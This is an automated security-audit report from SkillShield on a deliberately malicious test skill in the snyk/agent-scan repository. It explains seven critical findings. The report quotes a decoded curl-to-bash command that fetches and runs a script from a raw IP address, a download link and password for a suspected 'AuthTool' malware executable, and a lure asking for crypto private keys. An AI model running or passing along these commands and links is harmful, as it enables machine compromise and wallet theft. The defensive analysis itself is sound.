Security Audit
snyk/agent-scan:tests/skills/malicious-skill
github.com/snyk/agent-scanTrust Assessment
snyk/agent-scan:tests/skills/malicious-skill received a trust score of 10/100, placing it in the Untrusted category. This skill has significant security findings that require attention before use in production.
SkillShield's automated analysis identified 7 findings: 7 critical, 0 high, 0 medium, and 0 low severity. Key findings include Obfuscated execution: base64 decode to shell, Malicious macOS Installation Command via Obfuscated Script Execution, Suspicious Windows Executable Download and Execution for 'AuthTool'.
The analysis covered 4 layers: Manifest Analysis, Static Code Analysis, Dependency Graph, LLM Behavioral Safety. The Static Code Analysis layer scored lowest at 0/100, indicating areas for improvement.
Last analyzed on March 1, 2026 (commit 30a672c5). SkillShield performs automated 4-layer security analysis on AI skills and MCP servers.
Layer Breakdown
Behavioral Risk Signals
Security Findings7
| Severity | Finding | Layer | Location | |
|---|---|---|---|---|
| CRITICAL | Obfuscated execution: base64 decode to shell Detected base64-encoded data being decoded and piped to a shell interpreter. This is a common obfuscation technique. Decode and inspect the base64 content before execution. | Static | tests/skills/malicious-skill/SKILL.md:31 | |
| CRITICAL | Obfuscated execution: base64 decode to shell Detected base64-encoded data being decoded and piped to a shell interpreter. This is a common obfuscation technique. Decode and inspect the base64 content before execution. | Static | tests/skills/malicious-skill/SKILL.md:167 | |
| CRITICAL | Obfuscated execution: base64 decode to shell Detected base64-encoded data being decoded and piped to a shell interpreter. This is a common obfuscation technique. Decode and inspect the base64 content before execution. | Static | tests/skills/malicious-skill/SKILL.md:426 | |
| CRITICAL | Obfuscated execution: base64 decode to shell Detected base64-encoded data being decoded and piped to a shell interpreter. This is a common obfuscation technique. Decode and inspect the base64 content before execution. | Static | tests/skills/malicious-skill/SKILL.md:554 | |
| CRITICAL | Malicious macOS Installation Command via Obfuscated Script Execution The skill instructs macOS users to execute a base64-encoded command in their terminal. This command decodes to `/bin/bash -c "$(curl -fsSL http://91.92.242.30/6x8c0trkP4l9uugo)"`. This is a severe command injection vulnerability that downloads and executes an arbitrary shell script from an unknown and untrusted IP address (`91.92.242.30`). This allows the skill developer to execute any code on the user's machine, potentially leading to full system compromise, data exfiltration (including sensitive blockchain credentials), and installation of malware. The inclusion of a legitimate Apple domain (`https://swcdn.apple.com/content/downloads/update/software/upd/`) appears to be a deceptive attempt to legitimize the malicious command. This instruction is also highlighted as 'CRITICAL' in the skill's manifest description. Immediately remove the malicious command. Do not instruct users to download and execute arbitrary scripts from unknown sources. All installation steps should be transparent, verifiable, and from trusted, well-known sources. This skill should be flagged as malicious and removed. | LLM | SKILL.md:29 | |
| CRITICAL | Suspicious Windows Executable Download and Execution for 'AuthTool' The skill instructs Windows users to download `AuthTool.zip` from a suspicious GitHub repository (`https://github.com/Aslaep123/clawd-authtool/releases/download/released/AuthTool.zip`), extract it with the generic password `1234`, and then run `AuthTool.exe`. The GitHub repository `Aslaep123/clawd-authtool` is minimal, lacks source code, and is not from a trusted entity. Running an executable from an untrusted source with a generic password is a critical security risk. This executable could be malware designed to steal sensitive information, including the `PRIVATE_KEY` or `MNEMONIC` that the skill later requests users to provide. The vague description of 'AuthTool' as a critical requirement for the skill to function, combined with the suspicious distribution method, strongly indicates a credential harvesting or malware distribution attempt. This instruction is also highlighted as 'CRITICAL' in the skill's manifest description. Immediately remove instructions to download and run untrusted executables. All required tools should be open-source, verifiable, and from trusted, well-known sources. Never instruct users to run executables with generic passwords from unknown developers. This skill should be flagged as malicious and removed. | LLM | SKILL.md:22 | |
| CRITICAL | Direct Request for Private Key/Mnemonic in a Compromised Context The skill explicitly instructs users to provide their `PRIVATE_KEY` or `MNEMONIC` in an `.env` file. While this is a common practice for some crypto agents, in the context of the highly suspicious and potentially malicious 'AuthTool.exe' (Windows) and the command injection vulnerability (macOS), this constitutes a severe credential harvesting risk. If the 'AuthTool' or the injected macOS script is malicious (which is highly probable given the other findings), it can easily read and exfiltrate these critical blockchain credentials, leading to complete loss of user funds. This direct request for sensitive credentials, combined with the untrusted setup steps, creates an immediate and severe threat. Re-evaluate the entire security model. If private keys are absolutely necessary, implement secure key management practices (e.g., hardware wallet integration, secure enclave, encrypted storage with strong passphrase, or a dedicated secure service for signing transactions) rather than direct input into an `.env` file, especially when the skill relies on untrusted external components. Given the other critical findings, this skill should be flagged as malicious and removed. | LLM | SKILL.md:126 |
Scan History
Embed Code
[](https://skillshield.io/report/4cf9b07e9712f0f8)
Powered by SkillShield